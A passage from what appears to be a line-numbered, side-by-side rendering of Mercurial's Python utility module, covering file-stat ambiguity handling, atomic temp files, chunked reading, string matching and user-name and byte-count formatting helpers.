1947 __hash__ = object.__hash__
1956
1948
1957 def __eq__(self, old):
1949 def __eq__(self, old):
1958 try:
1950 try:
1959 # if ambiguity between stat of new and old file is
1951 # if ambiguity between stat of new and old file is
1960 # avoided, comparison of size, ctime and mtime is enough
1952 # avoided, comparison of size, ctime and mtime is enough
1961 # to exactly detect change of a file regardless of platform
1953 # to exactly detect change of a file regardless of platform
1962 return (self.stat.st_size == old.stat.st_size and
1954 return (self.stat.st_size == old.stat.st_size and
1963 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
1955 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
1964 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
1956 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
1965 except AttributeError:
1957 except AttributeError:
1966 pass
1958 pass
1967 try:
1959 try:
1968 return self.stat is None and old.stat is None
1960 return self.stat is None and old.stat is None
1969 except AttributeError:
1961 except AttributeError:
1970 return False
1962 return False
1971
1963
1972 def isambig(self, old):
1964 def isambig(self, old):
1973 """Examine whether new (= self) stat is ambiguous against old one
1965 """Examine whether new (= self) stat is ambiguous against old one
1974
1966
1975 "S[N]" below means stat of a file at N-th change:
1967 "S[N]" below means stat of a file at N-th change:
1976
1968
1977 - S[n-1].ctime < S[n].ctime: can detect change of a file
1969 - S[n-1].ctime < S[n].ctime: can detect change of a file
1978 - S[n-1].ctime == S[n].ctime
1970 - S[n-1].ctime == S[n].ctime
1979 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1971 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1980 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1972 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1981 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1973 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1982 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1974 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1983
1975
1984 Case (*2) above means that a file was changed twice or more at
1976 Case (*2) above means that a file was changed twice or more at
1985 same time in sec (= S[n-1].ctime), and comparison of timestamp
1977 same time in sec (= S[n-1].ctime), and comparison of timestamp
1986 is ambiguous.
1978 is ambiguous.
1987
1979
1988 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1980 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1989 timestamp is ambiguous".
1981 timestamp is ambiguous".
1990
1982
1991 But advancing mtime only in case (*2) doesn't work as
1983 But advancing mtime only in case (*2) doesn't work as
1992 expected, because naturally advanced S[n].mtime in case (*1)
1984 expected, because naturally advanced S[n].mtime in case (*1)
1993 might be equal to manually advanced S[n-1 or earlier].mtime.
1985 might be equal to manually advanced S[n-1 or earlier].mtime.
1994
1986
1995 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1987 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1996 treated as ambiguous regardless of mtime, to avoid overlooking
1988 treated as ambiguous regardless of mtime, to avoid overlooking
1997 by confliction between such mtime.
1989 by confliction between such mtime.
1998
1990
1999 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1991 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2000 S[n].mtime", even if size of a file isn't changed.
1992 S[n].mtime", even if size of a file isn't changed.
2001 """
1993 """
2002 try:
1994 try:
2003 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
1995 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2004 except AttributeError:
1996 except AttributeError:
2005 return False
1997 return False
2006
1998
2007 def avoidambig(self, path, old):
1999 def avoidambig(self, path, old):
2008 """Change file stat of specified path to avoid ambiguity
2000 """Change file stat of specified path to avoid ambiguity
2009
2001
2010 'old' should be previous filestat of 'path'.
2002 'old' should be previous filestat of 'path'.
2011
2003
2012 This skips avoiding ambiguity, if a process doesn't have
2004 This skips avoiding ambiguity, if a process doesn't have
2013 appropriate privileges for 'path'. This returns False in this
2005 appropriate privileges for 'path'. This returns False in this
2014 case.
2006 case.
2015
2007
2016 Otherwise, this returns True, as "ambiguity is avoided".
2008 Otherwise, this returns True, as "ambiguity is avoided".
2017 """
2009 """
2018 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2010 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2019 try:
2011 try:
2020 os.utime(path, (advanced, advanced))
2012 os.utime(path, (advanced, advanced))
2021 except OSError as inst:
2013 except OSError as inst:
2022 if inst.errno == errno.EPERM:
2014 if inst.errno == errno.EPERM:
2023 # utime() on the file created by another user causes EPERM,
2015 # utime() on the file created by another user causes EPERM,
2024 # if a process doesn't have appropriate privileges
2016 # if a process doesn't have appropriate privileges
2025 return False
2017 return False
2026 raise
2018 raise
2027 return True
2019 return True
2028
2020
2029 def __ne__(self, other):
2021 def __ne__(self, other):
2030 return not self == other
2022 return not self == other
2031
2023
2032 class atomictempfile(object):
2024 class atomictempfile(object):
2033 '''writable file object that atomically updates a file
2025 '''writable file object that atomically updates a file
2034
2026
2035 All writes will go to a temporary copy of the original file. Call
2027 All writes will go to a temporary copy of the original file. Call
2036 close() when you are done writing, and atomictempfile will rename
2028 close() when you are done writing, and atomictempfile will rename
2037 the temporary copy to the original name, making the changes
2029 the temporary copy to the original name, making the changes
2038 visible. If the object is destroyed without being closed, all your
2030 visible. If the object is destroyed without being closed, all your
2039 writes are discarded.
2031 writes are discarded.
2040
2032
2041 checkambig argument of constructor is used with filestat, and is
2033 checkambig argument of constructor is used with filestat, and is
2042 useful only if target file is guarded by any lock (e.g. repo.lock
2034 useful only if target file is guarded by any lock (e.g. repo.lock
2043 or repo.wlock).
2035 or repo.wlock).
2044 '''
2036 '''
2045 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2037 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2046 self.__name = name # permanent name
2038 self.__name = name # permanent name
2047 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2039 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2048 createmode=createmode)
2040 createmode=createmode)
2049 self._fp = posixfile(self._tempname, mode)
2041 self._fp = posixfile(self._tempname, mode)
2050 self._checkambig = checkambig
2042 self._checkambig = checkambig
2051
2043
2052 # delegated methods
2044 # delegated methods
2053 self.read = self._fp.read
2045 self.read = self._fp.read
2054 self.write = self._fp.write
2046 self.write = self._fp.write
2055 self.seek = self._fp.seek
2047 self.seek = self._fp.seek
2056 self.tell = self._fp.tell
2048 self.tell = self._fp.tell
2057 self.fileno = self._fp.fileno
2049 self.fileno = self._fp.fileno
2058
2050
2059 def close(self):
2051 def close(self):
2060 if not self._fp.closed:
2052 if not self._fp.closed:
2061 self._fp.close()
2053 self._fp.close()
2062 filename = localpath(self.__name)
2054 filename = localpath(self.__name)
2063 oldstat = self._checkambig and filestat.frompath(filename)
2055 oldstat = self._checkambig and filestat.frompath(filename)
2064 if oldstat and oldstat.stat:
2056 if oldstat and oldstat.stat:
2065 rename(self._tempname, filename)
2057 rename(self._tempname, filename)
2066 newstat = filestat.frompath(filename)
2058 newstat = filestat.frompath(filename)
2067 if newstat.isambig(oldstat):
2059 if newstat.isambig(oldstat):
2068 # stat of changed file is ambiguous to original one
2060 # stat of changed file is ambiguous to original one
2069 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2061 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2070 os.utime(filename, (advanced, advanced))
2062 os.utime(filename, (advanced, advanced))
2071 else:
2063 else:
2072 rename(self._tempname, filename)
2064 rename(self._tempname, filename)
2073
2065
2074 def discard(self):
2066 def discard(self):
2075 if not self._fp.closed:
2067 if not self._fp.closed:
2076 try:
2068 try:
2077 os.unlink(self._tempname)
2069 os.unlink(self._tempname)
2078 except OSError:
2070 except OSError:
2079 pass
2071 pass
2080 self._fp.close()
2072 self._fp.close()
2081
2073
2082 def __del__(self):
2074 def __del__(self):
2083 if safehasattr(self, '_fp'): # constructor actually did something
2075 if safehasattr(self, '_fp'): # constructor actually did something
2084 self.discard()
2076 self.discard()
2085
2077
2086 def __enter__(self):
2078 def __enter__(self):
2087 return self
2079 return self
2088
2080
2089 def __exit__(self, exctype, excvalue, traceback):
2081 def __exit__(self, exctype, excvalue, traceback):
2090 if exctype is not None:
2082 if exctype is not None:
2091 self.discard()
2083 self.discard()
2092 else:
2084 else:
2093 self.close()
2085 self.close()
2094
2086
2095 def unlinkpath(f, ignoremissing=False):
2087 def unlinkpath(f, ignoremissing=False):
2096 """unlink and remove the directory if it is empty"""
2088 """unlink and remove the directory if it is empty"""
2097 if ignoremissing:
2089 if ignoremissing:
2098 tryunlink(f)
2090 tryunlink(f)
2099 else:
2091 else:
2100 unlink(f)
2092 unlink(f)
2101 # try removing directories that might now be empty
2093 # try removing directories that might now be empty
2102 try:
2094 try:
2103 removedirs(os.path.dirname(f))
2095 removedirs(os.path.dirname(f))
2104 except OSError:
2096 except OSError:
2105 pass
2097 pass
2106
2098
2107 def tryunlink(f):
2099 def tryunlink(f):
2108 """Attempt to remove a file, ignoring ENOENT errors."""
2100 """Attempt to remove a file, ignoring ENOENT errors."""
2109 try:
2101 try:
2110 unlink(f)
2102 unlink(f)
2111 except OSError as e:
2103 except OSError as e:
2112 if e.errno != errno.ENOENT:
2104 if e.errno != errno.ENOENT:
2113 raise
2105 raise
2114
2106
2115 def makedirs(name, mode=None, notindexed=False):
2107 def makedirs(name, mode=None, notindexed=False):
2116 """recursive directory creation with parent mode inheritance
2108 """recursive directory creation with parent mode inheritance
2117
2109
2118 Newly created directories are marked as "not to be indexed by
2110 Newly created directories are marked as "not to be indexed by
2119 the content indexing service", if ``notindexed`` is specified
2111 the content indexing service", if ``notindexed`` is specified
2120 for "write" mode access.
2112 for "write" mode access.
2121 """
2113 """
2122 try:
2114 try:
2123 makedir(name, notindexed)
2115 makedir(name, notindexed)
2124 except OSError as err:
2116 except OSError as err:
2125 if err.errno == errno.EEXIST:
2117 if err.errno == errno.EEXIST:
2126 return
2118 return
2127 if err.errno != errno.ENOENT or not name:
2119 if err.errno != errno.ENOENT or not name:
2128 raise
2120 raise
2129 parent = os.path.dirname(os.path.abspath(name))
2121 parent = os.path.dirname(os.path.abspath(name))
2130 if parent == name:
2122 if parent == name:
2131 raise
2123 raise
2132 makedirs(parent, mode, notindexed)
2124 makedirs(parent, mode, notindexed)
2133 try:
2125 try:
2134 makedir(name, notindexed)
2126 makedir(name, notindexed)
2135 except OSError as err:
2127 except OSError as err:
2136 # Catch EEXIST to handle races
2128 # Catch EEXIST to handle races
2137 if err.errno == errno.EEXIST:
2129 if err.errno == errno.EEXIST:
2138 return
2130 return
2139 raise
2131 raise
2140 if mode is not None:
2132 if mode is not None:
2141 os.chmod(name, mode)
2133 os.chmod(name, mode)
2142
2134
2143 def readfile(path):
2135 def readfile(path):
2144 with open(path, 'rb') as fp:
2136 with open(path, 'rb') as fp:
2145 return fp.read()
2137 return fp.read()
2146
2138
2147 def writefile(path, text):
2139 def writefile(path, text):
2148 with open(path, 'wb') as fp:
2140 with open(path, 'wb') as fp:
2149 fp.write(text)
2141 fp.write(text)
2150
2142
2151 def appendfile(path, text):
2143 def appendfile(path, text):
2152 with open(path, 'ab') as fp:
2144 with open(path, 'ab') as fp:
2153 fp.write(text)
2145 fp.write(text)
2154
2146
2155 class chunkbuffer(object):
2147 class chunkbuffer(object):
2156 """Allow arbitrary sized chunks of data to be efficiently read from an
2148 """Allow arbitrary sized chunks of data to be efficiently read from an
2157 iterator over chunks of arbitrary size."""
2149 iterator over chunks of arbitrary size."""
2158
2150
2159 def __init__(self, in_iter):
2151 def __init__(self, in_iter):
2160 """in_iter is the iterator that's iterating over the input chunks."""
2152 """in_iter is the iterator that's iterating over the input chunks."""
2161 def splitbig(chunks):
2153 def splitbig(chunks):
2162 for chunk in chunks:
2154 for chunk in chunks:
2163 if len(chunk) > 2**20:
2155 if len(chunk) > 2**20:
2164 pos = 0
2156 pos = 0
2165 while pos < len(chunk):
2157 while pos < len(chunk):
2166 end = pos + 2 ** 18
2158 end = pos + 2 ** 18
2167 yield chunk[pos:end]
2159 yield chunk[pos:end]
2168 pos = end
2160 pos = end
2169 else:
2161 else:
2170 yield chunk
2162 yield chunk
2171 self.iter = splitbig(in_iter)
2163 self.iter = splitbig(in_iter)
2172 self._queue = collections.deque()
2164 self._queue = collections.deque()
2173 self._chunkoffset = 0
2165 self._chunkoffset = 0
2174
2166
2175 def read(self, l=None):
2167 def read(self, l=None):
2176 """Read L bytes of data from the iterator of chunks of data.
2168 """Read L bytes of data from the iterator of chunks of data.
2177 Returns less than L bytes if the iterator runs dry.
2169 Returns less than L bytes if the iterator runs dry.
2178
2170
2179 If size parameter is omitted, read everything"""
2171 If size parameter is omitted, read everything"""
2180 if l is None:
2172 if l is None:
2181 return ''.join(self.iter)
2173 return ''.join(self.iter)
2182
2174
2183 left = l
2175 left = l
2184 buf = []
2176 buf = []
2185 queue = self._queue
2177 queue = self._queue
2186 while left > 0:
2178 while left > 0:
2187 # refill the queue
2179 # refill the queue
2188 if not queue:
2180 if not queue:
2189 target = 2**18
2181 target = 2**18
2190 for chunk in self.iter:
2182 for chunk in self.iter:
2191 queue.append(chunk)
2183 queue.append(chunk)
2192 target -= len(chunk)
2184 target -= len(chunk)
2193 if target <= 0:
2185 if target <= 0:
2194 break
2186 break
2195 if not queue:
2187 if not queue:
2196 break
2188 break
2197
2189
2198 # The easy way to do this would be to queue.popleft(), modify the
2190 # The easy way to do this would be to queue.popleft(), modify the
2199 # chunk (if necessary), then queue.appendleft(). However, for cases
2191 # chunk (if necessary), then queue.appendleft(). However, for cases
2200 # where we read partial chunk content, this incurs 2 dequeue
2192 # where we read partial chunk content, this incurs 2 dequeue
2201 # mutations and creates a new str for the remaining chunk in the
2193 # mutations and creates a new str for the remaining chunk in the
2202 # queue. Our code below avoids this overhead.
2194 # queue. Our code below avoids this overhead.
2203
2195
2204 chunk = queue[0]
2196 chunk = queue[0]
2205 chunkl = len(chunk)
2197 chunkl = len(chunk)
2206 offset = self._chunkoffset
2198 offset = self._chunkoffset
2207
2199
2208 # Use full chunk.
2200 # Use full chunk.
2209 if offset == 0 and left >= chunkl:
2201 if offset == 0 and left >= chunkl:
2210 left -= chunkl
2202 left -= chunkl
2211 queue.popleft()
2203 queue.popleft()
2212 buf.append(chunk)
2204 buf.append(chunk)
2213 # self._chunkoffset remains at 0.
2205 # self._chunkoffset remains at 0.
2214 continue
2206 continue
2215
2207
2216 chunkremaining = chunkl - offset
2208 chunkremaining = chunkl - offset
2217
2209
2218 # Use all of unconsumed part of chunk.
2210 # Use all of unconsumed part of chunk.
2219 if left >= chunkremaining:
2211 if left >= chunkremaining:
2220 left -= chunkremaining
2212 left -= chunkremaining
2221 queue.popleft()
2213 queue.popleft()
2222 # offset == 0 is enabled by block above, so this won't merely
2214 # offset == 0 is enabled by block above, so this won't merely
2223 # copy via ``chunk[0:]``.
2215 # copy via ``chunk[0:]``.
2224 buf.append(chunk[offset:])
2216 buf.append(chunk[offset:])
2225 self._chunkoffset = 0
2217 self._chunkoffset = 0
2226
2218
2227 # Partial chunk needed.
2219 # Partial chunk needed.
2228 else:
2220 else:
2229 buf.append(chunk[offset:offset + left])
2221 buf.append(chunk[offset:offset + left])
2230 self._chunkoffset += left
2222 self._chunkoffset += left
2231 left -= chunkremaining
2223 left -= chunkremaining
2232
2224
2233 return ''.join(buf)
2225 return ''.join(buf)
2234
2226
2235 def filechunkiter(f, size=131072, limit=None):
2227 def filechunkiter(f, size=131072, limit=None):
2236 """Create a generator that produces the data in the file size
2228 """Create a generator that produces the data in the file size
2237 (default 131072) bytes at a time, up to optional limit (default is
2229 (default 131072) bytes at a time, up to optional limit (default is
2238 to read all data). Chunks may be less than size bytes if the
2230 to read all data). Chunks may be less than size bytes if the
2239 chunk is the last chunk in the file, or the file is a socket or
2231 chunk is the last chunk in the file, or the file is a socket or
2240 some other type of file that sometimes reads less data than is
2232 some other type of file that sometimes reads less data than is
2241 requested."""
2233 requested."""
2242 assert size >= 0
2234 assert size >= 0
2243 assert limit is None or limit >= 0
2235 assert limit is None or limit >= 0
2244 while True:
2236 while True:
2245 if limit is None:
2237 if limit is None:
2246 nbytes = size
2238 nbytes = size
2247 else:
2239 else:
2248 nbytes = min(limit, size)
2240 nbytes = min(limit, size)
2249 s = nbytes and f.read(nbytes)
2241 s = nbytes and f.read(nbytes)
2250 if not s:
2242 if not s:
2251 break
2243 break
2252 if limit:
2244 if limit:
2253 limit -= len(s)
2245 limit -= len(s)
2254 yield s
2246 yield s
2255
2247
2256 class cappedreader(object):
2248 class cappedreader(object):
2257 """A file object proxy that allows reading up to N bytes.
2249 """A file object proxy that allows reading up to N bytes.
2258
2250
2259 Given a source file object, instances of this type allow reading up to
2251 Given a source file object, instances of this type allow reading up to
2260 N bytes from that source file object. Attempts to read past the allowed
2252 N bytes from that source file object. Attempts to read past the allowed
2261 limit are treated as EOF.
2253 limit are treated as EOF.
2262
2254
2263 It is assumed that I/O is not performed on the original file object
2255 It is assumed that I/O is not performed on the original file object
2264 in addition to I/O that is performed by this instance. If there is,
2256 in addition to I/O that is performed by this instance. If there is,
2265 state tracking will get out of sync and unexpected results will ensue.
2257 state tracking will get out of sync and unexpected results will ensue.
2266 """
2258 """
2267 def __init__(self, fh, limit):
2259 def __init__(self, fh, limit):
2268 """Allow reading up to <limit> bytes from <fh>."""
2260 """Allow reading up to <limit> bytes from <fh>."""
2269 self._fh = fh
2261 self._fh = fh
2270 self._left = limit
2262 self._left = limit
2271
2263
2272 def read(self, n=-1):
2264 def read(self, n=-1):
2273 if not self._left:
2265 if not self._left:
2274 return b''
2266 return b''
2275
2267
2276 if n < 0:
2268 if n < 0:
2277 n = self._left
2269 n = self._left
2278
2270
2279 data = self._fh.read(min(n, self._left))
2271 data = self._fh.read(min(n, self._left))
2280 self._left -= len(data)
2272 self._left -= len(data)
2281 assert self._left >= 0
2273 assert self._left >= 0
2282
2274
2283 return data
2275 return data
2284
2276
2285 def stringmatcher(pattern, casesensitive=True):
2277 def stringmatcher(pattern, casesensitive=True):
2286 """
2278 """
2287 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2279 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2288 returns the matcher name, pattern, and matcher function.
2280 returns the matcher name, pattern, and matcher function.
2289 missing or unknown prefixes are treated as literal matches.
2281 missing or unknown prefixes are treated as literal matches.
2290
2282
2291 helper for tests:
2283 helper for tests:
2292 >>> def test(pattern, *tests):
2284 >>> def test(pattern, *tests):
2293 ... kind, pattern, matcher = stringmatcher(pattern)
2285 ... kind, pattern, matcher = stringmatcher(pattern)
2294 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2286 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2295 >>> def itest(pattern, *tests):
2287 >>> def itest(pattern, *tests):
2296 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2288 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2297 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2289 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2298
2290
2299 exact matching (no prefix):
2291 exact matching (no prefix):
2300 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2292 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2301 ('literal', 'abcdefg', [False, False, True])
2293 ('literal', 'abcdefg', [False, False, True])
2302
2294
2303 regex matching ('re:' prefix)
2295 regex matching ('re:' prefix)
2304 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2296 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2305 ('re', 'a.+b', [False, False, True])
2297 ('re', 'a.+b', [False, False, True])
2306
2298
2307 force exact matches ('literal:' prefix)
2299 force exact matches ('literal:' prefix)
2308 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2300 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2309 ('literal', 're:foobar', [False, True])
2301 ('literal', 're:foobar', [False, True])
2310
2302
2311 unknown prefixes are ignored and treated as literals
2303 unknown prefixes are ignored and treated as literals
2312 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2304 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2313 ('literal', 'foo:bar', [False, False, True])
2305 ('literal', 'foo:bar', [False, False, True])
2314
2306
2315 case insensitive regex matches
2307 case insensitive regex matches
2316 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2308 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2317 ('re', 'A.+b', [False, False, True])
2309 ('re', 'A.+b', [False, False, True])
2318
2310
2319 case insensitive literal matches
2311 case insensitive literal matches
2320 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2312 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2321 ('literal', 'ABCDEFG', [False, False, True])
2313 ('literal', 'ABCDEFG', [False, False, True])
2322 """
2314 """
2323 if pattern.startswith('re:'):
2315 if pattern.startswith('re:'):
2324 pattern = pattern[3:]
2316 pattern = pattern[3:]
2325 try:
2317 try:
2326 flags = 0
2318 flags = 0
2327 if not casesensitive:
2319 if not casesensitive:
2328 flags = remod.I
2320 flags = remod.I
2329 regex = remod.compile(pattern, flags)
2321 regex = remod.compile(pattern, flags)
2330 except remod.error as e:
2322 except remod.error as e:
2331 raise error.ParseError(_('invalid regular expression: %s')
2323 raise error.ParseError(_('invalid regular expression: %s')
2332 % e)
2324 % e)
2333 return 're', pattern, regex.search
2325 return 're', pattern, regex.search
2334 elif pattern.startswith('literal:'):
2326 elif pattern.startswith('literal:'):
2335 pattern = pattern[8:]
2327 pattern = pattern[8:]
2336
2328
2337 match = pattern.__eq__
2329 match = pattern.__eq__
2338
2330
2339 if not casesensitive:
2331 if not casesensitive:
2340 ipat = encoding.lower(pattern)
2332 ipat = encoding.lower(pattern)
2341 match = lambda s: ipat == encoding.lower(s)
2333 match = lambda s: ipat == encoding.lower(s)
2342 return 'literal', pattern, match
2334 return 'literal', pattern, match
2343
2335
2344 def shortuser(user):
2336 def shortuser(user):
2345 """Return a short representation of a user name or email address."""
2337 """Return a short representation of a user name or email address."""
2346 f = user.find('@')
2338 f = user.find('@')
2347 if f >= 0:
2339 if f >= 0:
2348 user = user[:f]
2340 user = user[:f]
2349 f = user.find('<')
2341 f = user.find('<')
2350 if f >= 0:
2342 if f >= 0:
2351 user = user[f + 1:]
2343 user = user[f + 1:]
2352 f = user.find(' ')
2344 f = user.find(' ')
2353 if f >= 0:
2345 if f >= 0:
2354 user = user[:f]
2346 user = user[:f]
2355 f = user.find('.')
2347 f = user.find('.')
2356 if f >= 0:
2348 if f >= 0:
2357 user = user[:f]
2349 user = user[:f]
2358 return user
2350 return user
2359
2351
2360 def emailuser(user):
2352 def emailuser(user):
2361 """Return the user portion of an email address."""
2353 """Return the user portion of an email address."""
2362 f = user.find('@')
2354 f = user.find('@')
2363 if f >= 0:
2355 if f >= 0:
2364 user = user[:f]
2356 user = user[:f]
2365 f = user.find('<')
2357 f = user.find('<')
2366 if f >= 0:
2358 if f >= 0:
2367 user = user[f + 1:]
2359 user = user[f + 1:]
2368 return user
2360 return user
2369
2361
2370 def email(author):
2362 def email(author):
2371 '''get email of author.'''
2363 '''get email of author.'''
2372 r = author.find('>')
2364 r = author.find('>')
2373 if r == -1:
2365 if r == -1:
2374 r = None
2366 r = None
2375 return author[author.find('<') + 1:r]
2367 return author[author.find('<') + 1:r]
2376
2368
2377 def ellipsis(text, maxlength=400):
2369 def ellipsis(text, maxlength=400):
2378 """Trim string to at most maxlength (default: 400) columns in display."""
2370 """Trim string to at most maxlength (default: 400) columns in display."""
2379 return encoding.trim(text, maxlength, ellipsis='...')
2371 return encoding.trim(text, maxlength, ellipsis='...')
2380
2372
2381 def unitcountfn(*unittable):
2373 def unitcountfn(*unittable):
2382 '''return a function that renders a readable count of some quantity'''
2374 '''return a function that renders a readable count of some quantity'''
2383
2375
2384 def go(count):
2376 def go(count):
2385 for multiplier, divisor, format in unittable:
2377 for multiplier, divisor, format in unittable:
2386 if abs(count) >= divisor * multiplier:
2378 if abs(count) >= divisor * multiplier:
2387 return format % (count / float(divisor))
2379 return format % (count / float(divisor))
2388 return unittable[-1][2] % count
2380 return unittable[-1][2] % count
2389
2381
2390 return go
2382 return go
2391
2383
2392 def processlinerange(fromline, toline):
2384 def processlinerange(fromline, toline):
2393 """Check that linerange <fromline>:<toline> makes sense and return a
2385 """Check that linerange <fromline>:<toline> makes sense and return a
2394 0-based range.
2386 0-based range.
2395
2387
2396 >>> processlinerange(10, 20)
2388 >>> processlinerange(10, 20)
2397 (9, 20)
2389 (9, 20)
2398 >>> processlinerange(2, 1)
2390 >>> processlinerange(2, 1)
2399 Traceback (most recent call last):
2391 Traceback (most recent call last):
2400 ...
2392 ...
2401 ParseError: line range must be positive
2393 ParseError: line range must be positive
2402 >>> processlinerange(0, 5)
2394 >>> processlinerange(0, 5)
2403 Traceback (most recent call last):
2395 Traceback (most recent call last):
2404 ...
2396 ...
2405 ParseError: fromline must be strictly positive
2397 ParseError: fromline must be strictly positive
2406 """
2398 """
2407 if toline - fromline < 0:
2399 if toline - fromline < 0:
2408 raise error.ParseError(_("line range must be positive"))
2400 raise error.ParseError(_("line range must be positive"))
2409 if fromline < 1:
2401 if fromline < 1:
2410 raise error.ParseError(_("fromline must be strictly positive"))
2402 raise error.ParseError(_("fromline must be strictly positive"))
2411 return fromline - 1, toline
2403 return fromline - 1, toline
2412
2404
2413 bytecount = unitcountfn(
2405 bytecount = unitcountfn(
2414 (100, 1 << 30, _('%.0f GB')),
2406 (100, 1 << 30, _('%.0f GB')),
2415 (10, 1 << 30, _('%.1f GB')),
2407 (10, 1 << 30, _('%.1f GB')),
2416 (1, 1 << 30, _('%.2f GB')),
2408 (1, 1 << 30, _('%.2f GB')),
2417 (100, 1 << 20, _('%.0f MB')),
2409 (100, 1 << 20, _('%.0f MB')),
2418 (10, 1 << 20, _('%.1f MB')),
2410 (10, 1 << 20, _('%.1f MB')),
2419 (1, 1 << 20, _('%.2f MB')),
2411 (1, 1 << 20, _('%.2f MB')),
2420 (100, 1 << 10, _('%.0f KB')),
2412 (100, 1 << 10, _('%.0f KB')),
2421 (10, 1 << 10, _('%.1f KB')),
2413 (10, 1 << 10, _('%.1f KB')),
2422 (1, 1 << 10, _('%.2f KB')),
2414 (1, 1 << 10, _('%.2f KB')),
2423 (1, 1, _('%.0f bytes')),
2415 (1, 1, _('%.0f bytes')),
2424 )
2416 )
2425
2417
2426 # Matches a single EOL which can either be a CRLF where repeated CR
2418 # Matches a single EOL which can either be a CRLF where repeated CR
2427 # are removed or a LF. We do not care about old Macintosh files, so a
2419 # are removed or a LF. We do not care about old Macintosh files, so a
2428 # stray CR is an error.
2420 # stray CR is an error.
2429 _eolre = remod.compile(br'\r*\n')
2421 _eolre = remod.compile(br'\r*\n')
2430
2422
2431 def tolf(s):
2423 def tolf(s):
2432 return _eolre.sub('\n', s)
2424 return _eolre.sub('\n', s)
2433
2425
2434 def tocrlf(s):
2426 def tocrlf(s):
2435 return _eolre.sub('\r\n', s)
2427 return _eolre.sub('\r\n', s)
2436
2428
2437 if pycompat.oslinesep == '\r\n':
2429 if pycompat.oslinesep == '\r\n':
2438 tonativeeol = tocrlf
2430 tonativeeol = tocrlf
2439 fromnativeeol = tolf
2431 fromnativeeol = tolf
2440 else:
2432 else:
2441 tonativeeol = pycompat.identity
2433 tonativeeol = pycompat.identity
2442 fromnativeeol = pycompat.identity
2434 fromnativeeol = pycompat.identity
2443
2435
2444 def escapestr(s):
2436 def escapestr(s):
2445 # call underlying function of s.encode('string_escape') directly for
2437 # call underlying function of s.encode('string_escape') directly for
2446 # Python 3 compatibility
2438 # Python 3 compatibility
2447 return codecs.escape_encode(s)[0]
2439 return codecs.escape_encode(s)[0]
2448
2440
2449 def unescapestr(s):
2441 def unescapestr(s):
2450 return codecs.escape_decode(s)[0]
2442 return codecs.escape_decode(s)[0]
2451
2443
2452 def forcebytestr(obj):
2444 def forcebytestr(obj):
2453 """Portably format an arbitrary object (e.g. exception) into a byte
2445 """Portably format an arbitrary object (e.g. exception) into a byte
2454 string."""
2446 string."""
2455 try:
2447 try:
2456 return pycompat.bytestr(obj)
2448 return pycompat.bytestr(obj)
2457 except UnicodeEncodeError:
2449 except UnicodeEncodeError:
2458 # non-ascii string, may be lossy
2450 # non-ascii string, may be lossy
2459 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2451 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2460
2452
2461 def uirepr(s):
2453 def uirepr(s):
2462 # Avoid double backslash in Windows path repr()
2454 # Avoid double backslash in Windows path repr()
2463 return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2455 return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2464
2456
2465 # delay import of textwrap
2457 # delay import of textwrap
2466 def MBTextWrapper(**kwargs):
2458 def MBTextWrapper(**kwargs):
2467 class tw(textwrap.TextWrapper):
2459 class tw(textwrap.TextWrapper):
2468 """
2460 """
2469 Extend TextWrapper for width-awareness.
2461 Extend TextWrapper for width-awareness.
2470
2462
2471 Neither number of 'bytes' in any encoding nor 'characters' is
2463 Neither number of 'bytes' in any encoding nor 'characters' is
2472 appropriate to calculate terminal columns for specified string.
2464 appropriate to calculate terminal columns for specified string.
2473
2465
2474 Original TextWrapper implementation uses built-in 'len()' directly,
